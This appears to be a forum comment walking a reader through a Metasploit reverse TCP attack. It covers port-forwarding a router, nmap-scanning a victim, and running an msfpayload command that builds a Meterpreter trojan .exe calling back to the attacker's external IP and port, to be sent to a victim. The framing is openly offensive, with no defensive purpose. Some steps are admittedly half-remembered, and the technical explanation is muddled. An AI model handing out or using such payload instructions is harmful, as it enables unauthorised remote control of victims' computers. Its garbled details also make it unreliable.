Really? Really? REALLY?!?!?! do some research and there isn’t just one way. lol
Reverse TCP (Easiest Attack Ever):
Anywho, I’ll stop being an ahole now lol…. First: Know YOUR ip address and make sure that you go into your router and enable port forwarding on a port. To do that find your routers/eternal ip address by typing into google “What’s my ip” Sound pretty easy right?! :P
Use a port number that has the same as an open port on the victims computer. Do that by port scanning the victims ip address. Backtrack has nmap.
Now load into metasploit “msfconsole” and boom…. I won’t explain the process because I really don’t remember the directories to load into but when you set the port number and ipaddress it’s going to be local. So use your external ip and forwarded port that you enabled on your router.
Afterwards you open in another terminal
Do the following
./msfpayload windows/meterpreter/reverse_tcp LHOST=(((((((((((((((YOUR ETERNAL IP w/out the parentheses)))))))))))))) LPORT=(((((((((((()YOUR PORT))))))))))))) x > /root/((((((((((((((((((((((NAME OF THE VIRUS FILE))))))))))))))))))).exe
What you’re doing is basically using your building a virus using metasploit that you are going send to the victim and when they open a reverse tcp/ip attack will begin. A revers tcp attack basically is an attack from the inside using the built trojan sending Syn,Syn-Ack, and Ack tcp packets creating a successful infamous 3-way handshake. Make sense? Cool! Finally you just type in the original terminal exploit or something….. I believe start exploit but don’t quote me on it.
DO SOME RESEARCH on the very vague steps that I left out because I didn’t explain everything. There’s a million other ways to do these attacks in a more advanced and quiet even easier way but seems like the rest of the world is happy doing this via metaploit/armitage.
